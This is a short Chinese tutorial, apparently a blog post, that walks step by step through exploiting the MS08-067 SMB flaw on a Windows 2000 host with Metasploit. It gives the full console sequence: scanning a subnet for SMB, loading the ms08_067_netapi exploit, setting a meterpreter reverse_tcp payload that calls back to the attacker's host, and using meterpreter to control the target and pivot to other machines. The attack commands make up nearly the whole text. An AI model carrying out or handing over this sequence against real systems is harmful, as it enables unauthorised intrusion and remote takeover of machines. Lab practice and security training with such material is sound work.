控制台是较为方便的操作接口,因此在命令行下输入msfconsole命令进入控制台

考虑到ms08-067是比较普遍也是较容易上手的安全漏洞,因此拿它作练习

首先进行扫描,确定开放samba服务的主机

加载扫描模块,use scanner/smb/version

设定扫描范围,set rhosts 192.168.11.0/24

查找到192.168.11.2,操作系统为windows 2000

查询相关资料,该版本存在ms08-067漏洞

在控制台中输入search ms08_067,查询目前加载的所有安全漏洞***模块,

每个模块,根据***成功的可能性,有评价

加载选定的***模块,use windows/smb/ms08_067_netapi

输入show options,查看模块涉及的参数

设定目标主机的地址,set rhost 192.168.11.2

查询与***模块有关的***代码,search payload

一旦漏洞***成功,通过***代码取得控制权或进行破坏

设定选定的***代码,set payload windows/meterpreter/reverse_tcp

再次输入show options,查看***代码的相关参数

设定***主机的地址,set lhost 192.168.11.10 ,以便于传回连接

输入exploit发起***

可能一次不能取得成功,可以多试几次

成功后,返回meterpreter控制台,取得对目标主机的控制权

控制台提供了系统命令,可以用于跳板***。